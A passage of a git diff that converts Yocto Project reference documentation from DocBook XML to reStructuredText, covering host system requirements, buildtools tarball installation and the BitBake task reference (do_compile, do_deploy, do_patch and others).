+   ``/home/your_username/buildtools``
+
+5. Source the tools environment setup script by using a command like the
+   following:
+   ::
+
+      $ source /home/your_username/buildtools/environment-setup-x86_64-poky-linux
+
+   Of course, you need to supply your installation directory and be sure to
+   use the right file (i.e. i586 or x86_64).
+
+   After you have sourced the setup script, the tools are added to
+   ``PATH`` and any other environment variables required to run the
+   tools are initialized. The results are working versions versions of
+   Git, tar, Python and ``chrpath``. And in the case of the
+   ``buildtools-extended`` tarball, additional working versions of tools
+   including ``gcc``, ``make`` and the other tools included in
+   ``packagegroup-core-buildessential``.
diff --git a/documentation/ref-manual/ref-system-requirements.xml b/documentation/ref-manual/ref-system-requirements.xml
deleted file mode 100644
index c6e1eb9716..0000000000
--- a/documentation/ref-manual/ref-system-requirements.xml
+++ /dev/null
@@ -1,578 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-manual-system-requirements'>
-<title>System Requirements</title>
-
-    <para>
-        Welcome to the Yocto Project Reference Manual!
-        This manual provides reference information for the current release
-        of the Yocto Project, and
-        is most effectively used after you have an understanding
-        of the basics of the Yocto Project.
-        The manual is neither meant to be read as a starting point to the
-        Yocto Project, nor read from start to finish.
-        Rather, use this manual to find variable definitions, class
-        descriptions, and so forth as needed during the course of using
-        the Yocto Project.
-    </para>
-
-    <para>
-        For introductory information on the Yocto Project, see the
-        <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink> and the
-        "<ulink url='&YOCTO_DOCS_OM_URL;#overview-development-environment'>Yocto Project Development Environment</ulink>"
-        chapter in the Yocto Project Overview and Concepts Manual.
-    </para>
-
-    <para>
-        If you want to use the Yocto Project to quickly build an image
-        without having to understand concepts, work through the
-        <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
-        document.
-        You can find "how-to" information in the
-        <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>.
-        You can find Yocto Project overview and conceptual information in the
-        <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>.
-        <note><title>Tip</title>
-            For more information about the Yocto Project Documentation set,
-            see the
-            "<link linkend='resources-links-and-related-documentation'>Links and Related Documentation</link>"
-            section.
-        </note>
-    </para>
-
-    <section id='detailed-supported-distros'>
-        <title>Supported Linux Distributions</title>
-
-        <para>
-            Currently, the Yocto Project is supported on the following
-            distributions:
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        Yocto Project releases are tested against the stable
-                        Linux distributions in the following list.
-                        The Yocto Project should work on other distributions but
-                        validation is not performed against them.
-                        </para></listitem>
-                    <listitem><para>
-                        In particular, the Yocto Project does not support
-                        and currently has no plans to support
-                        rolling-releases or development distributions due to
-                        their constantly changing nature.
-                        We welcome patches and bug reports, but keep in mind
-                        that our priority is on the supported platforms listed
-                        below.
-                        </para></listitem>
-                    <listitem><para>
-                        You may use Windows Subsystem For Linux v2 to set up a build
-                        host using Windows 10, but validation is not performed
-                        against build hosts using WSLv2.
-                        <note>
-                          The Yocto Project is not compatible with WSLv1, it is
-                          compatible but not officially supported nor validated
-                          with WSLv2, if you still decide to use WSL please upgrade
-                          to WSLv2.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        If you encounter problems, please go to
-                        <ulink url='&YOCTO_BUGZILLA_URL;'>Yocto Project Bugzilla</ulink>
-                        and submit a bug.
-                        We are interested in hearing about your experience.
-                        For information on how to submit a bug, see the
-                        Yocto Project
-                        <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>
-                        and the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</ulink>"
-                        section in the Yocto Project Development Tasks Manual.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-            <itemizedlist>
-                <listitem><para>Ubuntu 16.04 (LTS)</para></listitem>
-                <listitem><para>Ubuntu 18.04 (LTS)</para></listitem>
-                <listitem><para>Ubuntu 19.04</para></listitem>
-                <listitem><para>Ubuntu 20.04</para></listitem>
-                <listitem><para>Fedora 28</para></listitem>
-                <listitem><para>Fedora 29</para></listitem>
-                <listitem><para>Fedora 30</para></listitem>
-                <listitem><para>Fedora 31</para></listitem>
-                <listitem><para>Fedora 32</para></listitem>
-                <listitem><para>CentOS 7.x</para></listitem>
-                <listitem><para>Debian GNU/Linux 8.x (Jessie)</para></listitem>
-                <listitem><para>Debian GNU/Linux 9.x (Stretch)</para></listitem>
-                <listitem><para>Debian GNU/Linux 10.x (Buster)</para></listitem>
-                <listitem><para>OpenSUSE Leap 15.1</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <note>
-            While the Yocto Project Team attempts to ensure all Yocto Project
-            releases are one hundred percent compatible with each officially
-            supported Linux distribution, instances might exist where you
-            encounter a problem while using the Yocto Project on a specific
-            distribution.
-        </note>
-    </section>
-
-    <section id='required-packages-for-the-build-host'>
-    <title>Required Packages for the Build Host</title>
-
-        <para>
-            The list of packages you need on the host development system can
-            be large when covering all build scenarios using the Yocto Project.
-            This section describes required packages according to
-            Linux distribution and function.
-        </para>
-
-        <section id='ubuntu-packages'>
-            <title>Ubuntu and Debian</title>
-
-            <para>
-                The following list shows the required packages by function
-                given a supported Ubuntu or Debian Linux distribution:
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            If your build system has the
-                            <filename>oss4-dev</filename> package installed, you
-                            might experience QEMU build failures due to the package
-                            installing its own custom
-                            <filename>/usr/include/linux/soundcard.h</filename> on
-                            the Debian system.
-                            If you run into this situation, either of the following
-                            solutions exist:
-                            <literallayout class='monospaced'>
-     $ sudo apt-get build-dep qemu
-     $ sudo apt-get remove oss4-dev
-                            </literallayout>
-                        </para></listitem>
-                        <listitem><para>
-                            For Debian-8, <filename>python3-git</filename> and <filename>pylint3</filename> are no longer available via <filename>apt-get</filename>.
-                            <literallayout class='monospaced'>
-     $ sudo pip3 install GitPython pylint==1.9.5
-                            </literallayout>
-                        </para></listitem>
-                    </itemizedlist>
-                 </note>
-                <itemizedlist>
-                    <listitem><para><emphasis>Essentials:</emphasis>
-                        Packages needed to build an image on a headless
-                        system:
-                        <literallayout class='monospaced'>
-     $ sudo apt-get install &UBUNTU_HOST_PACKAGES_ESSENTIAL;
-                        </literallayout></para></listitem>
-                    <listitem><para><emphasis>Documentation:</emphasis>
-                        Packages needed if you are going to build out the
-                        Yocto Project documentation manuals:
-                        <literallayout class='monospaced'>
-     $ sudo apt-get install make xsltproc docbook-utils fop dblatex xmlto
-                        </literallayout></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='fedora-packages'>
-            <title>Fedora Packages</title>
-
-            <para>
-                The following list shows the required packages by function
-                given a supported Fedora Linux distribution:
-                <itemizedlist>
-                    <listitem><para><emphasis>Essentials:</emphasis>
-                        Packages needed to build an image for a headless
-                        system:
-                        <literallayout class='monospaced'>
-     $ sudo dnf install &FEDORA_HOST_PACKAGES_ESSENTIAL;
-                        </literallayout></para></listitem>
-                    <listitem><para><emphasis>Documentation:</emphasis>
-                        Packages needed if you are going to build out the
-                        Yocto Project documentation manuals:
-                        <literallayout class='monospaced'>
-     $ sudo dnf install docbook-style-dsssl docbook-style-xsl \
-     docbook-dtds docbook-utils fop libxslt dblatex xmlto
-                        </literallayout></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='opensuse-packages'>
-            <title>openSUSE Packages</title>
-
-            <para>
-                The following list shows the required packages by function
-                given a supported openSUSE Linux distribution:
-                <itemizedlist>
-                    <listitem><para><emphasis>Essentials:</emphasis>
-                        Packages needed to build an image for a headless
-                        system:
-                        <literallayout class='monospaced'>
-     $ sudo zypper install &OPENSUSE_HOST_PACKAGES_ESSENTIAL;
-                        </literallayout></para></listitem>
-                    <listitem><para><emphasis>Documentation:</emphasis>
-                        Packages needed if you are going to build out the
-                        Yocto Project documentation manuals:
-                        <literallayout class='monospaced'>
-     $ sudo zypper install dblatex xmlto
-                        </literallayout></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='centos-7-packages'>
-            <title>CentOS-7 Packages</title>
-
-            <para>
-                The following list shows the required packages by function
-                given a supported CentOS-7 Linux distribution:
-                <itemizedlist>
-                    <listitem><para><emphasis>Essentials:</emphasis>
-                        Packages needed to build an image for a headless
-                        system:
-                        <literallayout class='monospaced'>
-     $ sudo yum install &CENTOS7_HOST_PACKAGES_ESSENTIAL;
-                        </literallayout>
-                        <note><title>Notes</title>
-                            <itemizedlist>
-                                <listitem><para>
-                                    Extra Packages for Enterprise Linux
-                                    (i.e. <filename>epel-release</filename>)
-                                    is a collection of packages from Fedora
-                                    built on RHEL/CentOS for easy installation
-                                    of packages not included in enterprise
-                                    Linux by default.
-                                    You need to install these packages
-                                    separately.
-                                </para></listitem>
-                                <listitem><para>
-                                    The <filename>makecache</filename> command
-                                    consumes additional Metadata from
-                                    <filename>epel-release</filename>.
-                                </para></listitem>
-                            </itemizedlist>
-                        </note>
-                    </para></listitem>
-                    <listitem><para><emphasis>Documentation:</emphasis>
-                        Packages needed if you are going to build out the
-                        Yocto Project documentation manuals:
-                        <literallayout class='monospaced'>
-     $ sudo yum install docbook-style-dsssl docbook-style-xsl \
-     docbook-dtds docbook-utils fop libxslt dblatex xmlto
-                        </literallayout>
-                    </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='centos-8-packages'>
-            <title>CentOS-8 Packages</title>
-
-            <para>
-                The following list shows the required packages by function
-                given a supported CentOS-8 Linux distribution:
-                <itemizedlist>
-                    <listitem><para><emphasis>Essentials:</emphasis>
-                        Packages needed to build an image for a headless
-                        system:
-                        <literallayout class='monospaced'>
-     $ sudo dnf install &CENTOS8_HOST_PACKAGES_ESSENTIAL;
-                        </literallayout>
-                        <note><title>Notes</title>
-                            <itemizedlist>
-                                <listitem><para>
-                                    Extra Packages for Enterprise Linux
-                                    (i.e. <filename>epel-release</filename>)
-                                    is a collection of packages from Fedora
-                                    built on RHEL/CentOS for easy installation
-                                    of packages not included in enterprise
-                                    Linux by default.
-                                    You need to install these packages
-                                    separately.
-                                </para></listitem>
-                                <listitem><para>
-                                    The <filename>PowerTools</filename> repo
-                                    provides additional packages such as
-                                    <filename>rpcgen</filename> and
-                                    <filename>texinfo</filename>.
-                                </para></listitem>
-                                <listitem><para>
-                                    The <filename>makecache</filename> command
-                                    consumes additional Metadata from
-                                    <filename>epel-release</filename>.
-                                </para></listitem>
-                            </itemizedlist>
-                        </note>
-                    </para></listitem>
-                    <listitem><para><emphasis>Documentation:</emphasis>
-                        Packages needed if you are going to build out the
-                        Yocto Project documentation manuals:
-                        <literallayout class='monospaced'>
-     $ sudo dnf install docbook-style-dsssl docbook-style-xsl \
-     docbook-dtds docbook-utils fop libxslt dblatex xmlto
-                        </literallayout>
-                    </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='required-git-tar-python-and-gcc-versions'>
-        <title>Required Git, tar, Python and gcc Versions</title>
-
-        <para>
-            In order to use the build system, your host development system
-            must meet the following version requirements for Git, tar, and
-            Python:
-            <itemizedlist>
-                <listitem><para>Git 1.8.3.1 or greater</para></listitem>
-                <listitem><para>tar 1.28 or greater</para></listitem>
-                <listitem><para>Python 3.5.0 or greater</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            If your host development system does not meet all these requirements,
-            you can resolve this by installing a <filename>buildtools</filename>
-            tarball that contains these tools.
-            You can get the tarball one of two ways: download a pre-built
-            tarball or use BitBake to build the tarball.
-        </para>
-
-        <para>
-            In addition, your host development system must meet the following
-            version requirement for gcc:
-            <itemizedlist>
-                <listitem><para>gcc 5.0 or greater</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            If your host development system does not meet this requirement,
-            you can resolve this by installing a <filename>buildtools-extended</filename>
-            tarball that contains additional tools, the equivalent of <filename>buildtools-essential</filename>.
-        </para>
-        <section id='installing-a-pre-built-buildtools-tarball-with-install-buildtools-script'>
-            <title>Installing a Pre-Built <filename>buildtools</filename> Tarball with <filename>install-buildtools</filename> script</title>
-
-            <para>
-                The <filename>install-buildtools</filename> script is the easiest
-                of the three methods by which you can get these tools. It downloads
-                a pre-built buildtools installer and automatically installs the tools
-                for you:
-            <orderedlist>
-                <listitem><para>
-                    Execute the <filename>install-buildtools</filename> script.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     $ cd poky
-     $ scripts/install-buildtools --without-extended-buildtools \
-       --base-url &YOCTO_DL_URL;/releases/yocto \
-       --release yocto-&DISTRO; \
-       --installer-version &DISTRO;
-                    </literallayout>
-                    <para>
-                        During execution, the buildtools tarball will be downloaded,
-                        the checksum of the download will be verified, the installer
-                        will be run for you, and some basic checks will be run to
-                        to make sure the installation is functional.
-                    </para>
-                    <para>
-                        To avoid the need of <filename>sudo</filename> privileges,
-                        the <filename>install-buildtools</filename> script will
-                        by default tell the installer to install in:
-                        <literallayout class='monospaced'>
-     <replaceable>/path/to/</replaceable>poky/buildtools
-                        </literallayout>
-                    </para>
-                    <para>
-                        If your host development system needs the additional tools
-                        provided in the <filename>buildtools-extended</filename>
-                        tarball, you can instead execute the
-                        <filename>install-buildtools</filename> script with the
-                        default parameters:
-                        <literallayout class='monospaced'>
-     $ cd poky
-     $ scripts/install-buildtools
-                        </literallayout>
-                    </para>
-                </para></listitem>
-                <listitem><para>
-                    Source the tools environment setup script by using a
-                    command like the following:
-                    <literallayout class='monospaced'>
-     $ source <replaceable>/path/to/</replaceable>poky/buildtools/environment-setup-x86_64-pokysdk-linux
-                    </literallayout>
-                    Of course, you need to supply your installation directory and be
-                    sure to use the right file (i.e. i586 or x86_64).
-                </para>
-                <para>
-                    After you have sourced the setup script,
-                    the tools are added to <filename>PATH</filename>
-                    and any other environment variables required to run the
-                    tools are initialized.
-                    The results are working versions versions of Git, tar,
-                    Python and <filename>chrpath</filename>. And in the case of
-                    the <filename>buildtools-extended</filename> tarball, additional
-                    working versions of tools including <filename>gcc</filename>,
-                    <filename>make</filename> and the other tools included in
-                    <filename>packagegroup-core-buildessential</filename>.
-                </para></listitem>
-            </orderedlist>
-            </para>
-        </section>
-
-        <section id='downloading-a-pre-built-buildtools-tarball'>
-            <title>Downloading a Pre-Built <filename>buildtools</filename> Tarball</title>
-
-            <para>
-                Downloading and running a pre-built buildtools installer is
-                the easiest of the two methods by which you can get these tools:
-                <orderedlist>
-                    <listitem><para>
-                        Locate and download the <filename>*.sh</filename> at
-                        <ulink url='&YOCTO_RELEASE_DL_URL;/buildtools/'></ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        Execute the installation script.
-                        Here is an example for the traditional installer:
-                        <literallayout class='monospaced'>
-     $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
-                        </literallayout>
-                        Here is an example for the extended installer:
-                        <literallayout class='monospaced'>
-     $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
-                        </literallayout>
-                        During execution, a prompt appears that allows you to
-                        choose the installation directory.
-                        For example, you could choose the following:
-                        <literallayout class='monospaced'>
-     /home/<replaceable>your-username</replaceable>/buildtools
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Source the tools environment setup script by using a
-                        command like the following:
-                        <literallayout class='monospaced'>
-     $ source /home/<replaceable>your_username</replaceable>/buildtools/environment-setup-i586-poky-linux
-                        </literallayout>
-                        Of course, you need to supply your installation directory and be
-                        sure to use the right file (i.e. i585 or x86-64).
-                        </para>
-                        <para>
-                        After you have sourced the setup script,
-                        the tools are added to <filename>PATH</filename>
-                        and any other environment variables required to run the
-                        tools are initialized.
-                        The results are working versions versions of Git, tar,
-                        Python and <filename>chrpath</filename>. And in the case of
-                        the <filename>buildtools-extended</filename> tarball, additional
-                        working versions of tools including <filename>gcc</filename>,
-                        <filename>make</filename> and the other tools included in
-                        <filename>packagegroup-core-buildessential</filename>.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='building-your-own-buildtools-tarball'>
-            <title>Building Your Own <filename>buildtools</filename> Tarball</title>
-
-            <para>
-                Building and running your own buildtools installer applies
-                only when you have a build host that can already run BitBake.
-                In this case, you use that machine to build the
-                <filename>.sh</filename> file and then
-                take steps to transfer and run it on a
-                machine that does not meet the minimal Git, tar, and Python
-                (or gcc) requirements.
-            </para>
-
-            <para>
-                Here are the steps to take to build and run your own
-                buildtools installer:
-                <orderedlist>
-                    <listitem><para>
-                        On the machine that is able to run BitBake,
-                        be sure you have set up your build environment with
-                        the setup script
-                        (<link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
-                        </para></listitem>
-                    <listitem><para>
-                        Run the BitBake command to build the tarball:
-                        <literallayout class='monospaced'>
-     $ bitbake buildtools-tarball
-                        </literallayout>
-                        or run the BitBake command to build the extended tarball:
-                        <literallayout class='monospaced'>
-     $ bitbake buildtools-extended-tarball
-                        </literallayout>
-                        <note>
-                        The
-                        <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>
-                        variable in your <filename>local.conf</filename> file
-                        determines whether you build tools for a 32-bit
-                        or 64-bit system.
-                       </note>
-                       Once the build completes, you can find the
-                       <filename>.sh</filename> file that installs
-                       the tools in the <filename>tmp/deploy/sdk</filename>
-                       subdirectory of the
-                       <link linkend='build-directory'>Build Directory</link>.
-                       The installer file has the string "buildtools"
-                       (or "buildtools-extended") in the name.
-                       </para></listitem>
-                   <listitem><para>
-                       Transfer the <filename>.sh</filename> file from the
-                       build host to the machine that does not meet the
-                       Git, tar, or Python (or gcc) requirements.
-                       </para></listitem>
-                   <listitem><para>
-                       On the machine that does not meet the requirements,
-                       run the <filename>.sh</filename> file
-                       to install the tools.
-                       Here is an example for the traditional installer:
-                       <literallayout class='monospaced'>
-     $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
-                       </literallayout>
-                       Here is an example for the extended installer:
-                       <literallayout class='monospaced'>
-     $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
-                       </literallayout>
-                       During execution, a prompt appears that allows you to
-                       choose the installation directory.
-                       For example, you could choose the following:
-                       <literallayout class='monospaced'>
-     /home/<replaceable>your_username</replaceable>/buildtools
-                       </literallayout>
-                       </para></listitem>
-                    <listitem><para>
-                        Source the tools environment setup script by using a
-                        command like the following:
-                        <literallayout class='monospaced'>
-     $ source /home/<replaceable>your_username</replaceable>/buildtools/environment-setup-x86_64-poky-linux
-                        </literallayout>
-                        Of course, you need to supply your installation directory and be
-                        sure to use the right file (i.e. i586 or x86_64).
-                        </para>
-                        <para>
-                        After you have sourced the setup script,
-                        the tools are added to <filename>PATH</filename>
-                        and any other environment variables required to run the
-                        tools are initialized.
-                        The results are working versions versions of Git, tar,
-                        Python and <filename>chrpath</filename>. And in the case of
-                        the <filename>buildtools-extended</filename> tarball, additional
-                        working versions of tools including <filename>gcc</filename>,
-                        <filename>make</filename> and the other tools included in
-                        <filename>packagegroup-core-buildessential</filename>.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-tasks.rst b/documentation/ref-manual/ref-tasks.rst
new file mode 100644
index 0000000000..2f1959a010
--- /dev/null
+++ b/documentation/ref-manual/ref-tasks.rst
@@ -0,0 +1,855 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****
+Tasks
+*****
+
+Tasks are units of execution for BitBake. Recipes (``.bb`` files) use
+tasks to complete configuring, compiling, and packaging software. This
+chapter provides a reference of the tasks defined in the OpenEmbedded
+build system.
+
+Normal Recipe Build Tasks
+=========================
+
+The following sections describe normal tasks associated with building a
+recipe. For more information on tasks and dependencies, see the
+":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+BitBake User Manual.
+
+.. _ref-tasks-build:
+
+``do_build``
+------------
+
+The default task for all recipes. This task depends on all other normal
+tasks required to build a recipe.
+
+.. _ref-tasks-compile:
+
+``do_compile``
+--------------
+
+Compiles the source code. This task runs with the current working
+directory set to ``${``\ :term:`B`\ ``}``.
+
+The default behavior of this task is to run the ``oe_runmake`` function
+if a makefile (``Makefile``, ``makefile``, or ``GNUmakefile``) is found.
+If no such file is found, the ``do_compile`` task does nothing.
+
+.. _ref-tasks-compile_ptest_base:
+
+``do_compile_ptest_base``
+-------------------------
+
+Compiles the runtime test suite included in the software being built.
+
+.. _ref-tasks-configure:
+
+``do_configure``
+----------------
+
+Configures the source by enabling and disabling any build-time and
+configuration options for the software being built. The task runs with
+the current working directory set to ``${``\ :term:`B`\ ``}``.
+
+The default behavior of this task is to run ``oe_runmake clean`` if a
+makefile (``Makefile``, ``makefile``, or ``GNUmakefile``) is found and
+:term:`CLEANBROKEN` is not set to "1". If no such
+file is found or the ``CLEANBROKEN`` variable is set to "1", the
+``do_configure`` task does nothing.
+
+.. _ref-tasks-configure_ptest_base:
+
+``do_configure_ptest_base``
+---------------------------
+
+Configures the runtime test suite included in the software being built.
+
+.. _ref-tasks-deploy:
+
+``do_deploy``
+-------------
+
+Writes output files that are to be deployed to
+``${``\ :term:`DEPLOY_DIR_IMAGE`\ ``}``. The
+task runs with the current working directory set to
+``${``\ :term:`B`\ ``}``.
+
+Recipes implementing this task should inherit the
+:ref:`deploy <ref-classes-deploy>` class and should write the output
+to ``${``\ :term:`DEPLOYDIR`\ ``}``, which is not to be
+confused with ``${DEPLOY_DIR}``. The ``deploy`` class sets up
+``do_deploy`` as a shared state (sstate) task that can be accelerated
+through sstate use. The sstate mechanism takes care of copying the
+output from ``${DEPLOYDIR}`` to ``${DEPLOY_DIR_IMAGE}``.
+
+.. note::
+
+   Do not write the output directly to ``${DEPLOY_DIR_IMAGE}``, as this causes
+   the sstate mechanism to malfunction.
+
+The ``do_deploy`` task is not added as a task by default and
+consequently needs to be added manually. If you want the task to run
+after :ref:`ref-tasks-compile`, you can add it by doing
+the following:
+::
+
+      addtask deploy after do_compile
+
+Adding ``do_deploy`` after other tasks works the same way.
+
+.. note::
+
+   You do not need to add ``before do_build`` to the ``addtask`` command
+   (though it is harmless), because the ``base`` class contains the following:
+   ::
+
+           do_build[recrdeptask] += "do_deploy"
+
+
+   See the ":ref:`bitbake-user-manual/bitbake-user-manual-execution:dependencies`"
+   section in the BitBake User Manual for more information.
+
+If the ``do_deploy`` task re-executes, any previous output is removed
+(i.e. "cleaned").
+
+.. _ref-tasks-fetch:
+
+``do_fetch``
+------------
+
+Fetches the source code. This task uses the
+:term:`SRC_URI` variable and the argument's prefix to
+determine the correct :ref:`fetcher <bitbake:bb-fetchers>`
+module.
+
+.. _ref-tasks-image:
+
+``do_image``
+------------
+
+Starts the image generation process. The ``do_image`` task runs after
+the OpenEmbedded build system has run the
+:ref:`ref-tasks-rootfs` task during which packages are
+identified for installation into the image and the root filesystem is
+created, complete with post-processing.
+
+The ``do_image`` task performs pre-processing on the image through the
+:term:`IMAGE_PREPROCESS_COMMAND` and
+dynamically generates supporting ``do_image_*`` tasks as needed.
+
+For more information on image creation, see the ":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-image-complete:
+
+``do_image_complete``
+---------------------
+
+Completes the image generation process. The ``do_image_complete`` task
+runs after the OpenEmbedded build system has run the
+:ref:`ref-tasks-image` task during which image
+pre-processing occurs and through dynamically generated ``do_image_*``
+tasks the image is constructed.
+
+The ``do_image_complete`` task performs post-processing on the image
+through the
+:term:`IMAGE_POSTPROCESS_COMMAND`.
+
+For more information on image creation, see the
+":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-install:
+
+``do_install``
+--------------
+
+Copies files that are to be packaged into the holding area
+``${``\ :term:`D`\ ``}``. This task runs with the current
+working directory set to ``${``\ :term:`B`\ ``}``, which is the
+compilation directory. The ``do_install`` task, as well as other tasks
+that either directly or indirectly depend on the installed files (e.g.
+:ref:`ref-tasks-package`, ``do_package_write_*``, and
+:ref:`ref-tasks-rootfs`), run under
+:ref:`fakeroot <overview-manual/overview-manual-concepts:fakeroot and pseudo>`.
+
+.. note::
+
+   When installing files, be careful not to set the owner and group IDs
+   of the installed files to unintended values. Some methods of copying
+   files, notably when using the recursive ``cp`` command, can preserve
+   the UID and/or GID of the original file, which is usually not what
+   you want. The ``host-user-contaminated`` QA check checks for files
+   that probably have the wrong ownership.
+
+   Safe methods for installing files include the following:
+
+   -  The ``install`` utility. This utility is the preferred method.
+
+   -  The ``cp`` command with the "--no-preserve=ownership" option.
+
+   -  The ``tar`` command with the "--no-same-owner" option. See the
+      ``bin_package.bbclass`` file in the ``meta/classes`` directory of
+      the :term:`Source Directory` for an example.
+
+.. _ref-tasks-install_ptest_base:
+
+``do_install_ptest_base``
+-------------------------
+
+Copies the runtime test suite files from the compilation directory to a
+holding area.
+
+.. _ref-tasks-package:
+
+``do_package``
+--------------
+
+Analyzes the content of the holding area
+``${``\ :term:`D`\ ``}`` and splits the content into subsets
+based on available packages and files. This task makes use of the
+:term:`PACKAGES` and :term:`FILES`
+variables.
+
+The ``do_package`` task, in conjunction with the
+:ref:`ref-tasks-packagedata` task, also saves some
+important package metadata. For additional information, see the
+:term:`PKGDESTWORK` variable and the
+":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_qa:
+
+``do_package_qa``
+-----------------
+
+Runs QA checks on packaged files. For more information on these checks,
+see the :ref:`insane <ref-classes-insane>` class.
+
+.. _ref-tasks-package_write_deb:
+
+``do_package_write_deb``
+------------------------
+
+Creates Debian packages (i.e. ``*.deb`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_DEB`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_ipk:
+
+``do_package_write_ipk``
+------------------------
+
+Creates IPK packages (i.e. ``*.ipk`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_IPK`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_rpm:
+
+``do_package_write_rpm``
+------------------------
+
+Creates RPM packages (i.e. ``*.rpm`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_RPM`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_tar:
+
+``do_package_write_tar``
+------------------------
+
+Creates tarballs and places them in the
+``${``\ :term:`DEPLOY_DIR_TAR`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-packagedata:
+
+``do_packagedata``
+------------------
+
+Saves package metadata generated by the
+:ref:`ref-tasks-package` task in
+:term:`PKGDATA_DIR` to make it available globally.
+
+.. _ref-tasks-patch:
+
+``do_patch``
+------------
+
+Locates patch files and applies them to the source code.
+
+After fetching and unpacking source files, the build system uses the
+recipe's :term:`SRC_URI` statements
+to locate and apply patch files to the source code.
+
+.. note::
+
+   The build system uses the :term:`FILESPATH` variable to determine the
+   default set of directories when searching for patches.
+
+Patch files, by default, are ``*.patch`` and ``*.diff`` files created
+and kept in a subdirectory of the directory holding the recipe file. For
+example, consider the
+:yocto_git:`bluez5 </cgit/cgit.cgi/poky/tree/meta/recipes-connectivity/bluez5>`
+recipe from the OE-Core layer (i.e. ``poky/meta``):
+::
+
+   poky/meta/recipes-connectivity/bluez5
+
+This recipe has two patch files located here:
+::
+
+   poky/meta/recipes-connectivity/bluez5/bluez5
+
+In the ``bluez5`` recipe, the ``SRC_URI`` statements point to the source
+and patch files needed to build the package.
+
+.. note::
+
+   In the case for the ``bluez5_5.48.bb`` recipe, the ``SRC_URI`` statements
+   are from an include file ``bluez5.inc``.
+
+As mentioned earlier, the build system treats files whose file types are
+``.patch`` and ``.diff`` as patch files. However, you can use the
+"apply=yes" parameter with the ``SRC_URI`` statement to indicate any
+file as a patch file:
+::
+
+   SRC_URI = " \
+       git://path_to_repo/some_package \
+       file://file;apply=yes \
+       "
+
+Conversely, if you have a file whose file type is ``.patch`` or ``.diff``
+and you want to exclude it so that the ``do_patch`` task does not apply
+it during the patch phase, you can use the "apply=no" parameter with the
+:term:`SRC_URI` statement::
+
+   SRC_URI = " \
+       git://path_to_repo/some_package \
+       file://file1.patch \
+       file://file2.patch;apply=no \
+       "
+
+In the previous example ``file1.patch`` would be applied as a patch by default
+while ``file2.patch`` would not be applied.
+
+You can find out more about the patching process in the
+":ref:`patching-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual and the
+":ref:`new-recipe-patching-code`" section in the
+Yocto Project Development Tasks Manual.
+
+.. _ref-tasks-populate_lic:
+
+``do_populate_lic``
+-------------------
+
+Writes license information for the recipe that is collected later when
+the image is constructed.
+
+.. _ref-tasks-populate_sdk:
+
+``do_populate_sdk``
+-------------------
+
+Creates the file and directory structure for an installable SDK. See the
+":ref:`sdk-generation-dev-environment`"
